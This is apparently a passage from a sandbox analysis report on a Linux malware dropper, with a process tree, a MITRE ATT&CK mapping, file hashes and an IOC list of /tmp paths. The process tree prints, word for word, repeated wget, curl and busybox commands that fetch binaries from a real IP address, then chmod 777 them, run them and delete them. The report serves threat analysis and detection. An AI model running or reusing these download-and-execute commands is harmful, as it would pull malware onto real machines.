  - File and Directory Permissions Modification
  PID:1657
- /tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  ./5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - Executes dropped EXE
  PID:1658
- /bin/rm
  rm 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:1659
- /usr/bin/wget
  wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:1660
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - Writes file to tmp directory
  PID:1661
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:1662
- /bin/chmod
  chmod 777 cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - File and Directory Permissions Modification
  PID:1663
- /tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  ./cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - Executes dropped EXE
  PID:1664
- /bin/rm
  rm cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:1665
- /usr/bin/wget
  wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:1666
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - Writes file to tmp directory
  PID:1667
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:1668
- /bin/chmod
  chmod 777 Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - File and Directory Permissions Modification
  PID:1669
- /tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  ./Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - Executes dropped EXE
  PID:1670
- /bin/rm
  rm Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:1671
- /usr/bin/wget
  wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:1672
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - Writes file to tmp directory
  PID:1673
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:1674
- /bin/chmod
  chmod 777 RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - File and Directory Permissions Modification
  PID:1675
- /tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  ./RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - Executes dropped EXE
  PID:1676
- /bin/rm
  rm RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:1677

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW	1511	SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg	1520	vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK	1526	0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p	1532	Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm	1538	RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU	1544	yuFnig7SLqukn75LnZmw06l61kE18cmyJU
/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX	1550	D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH	1556	5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O	1562	cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY	1568	buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx	1574	Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r	1580	WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv	1586	fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6	1592	KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r	1598	WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY	1604	buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx	1610	Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv	1616	fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6	1622	KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK	1628	0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW	1634	SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg	1640	vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU	1646	yuFnig7SLqukn75LnZmw06l61kE18cmyJU
/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX	1652	D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH	1658	5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O	1664	cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p	1670	Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm	1676	RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm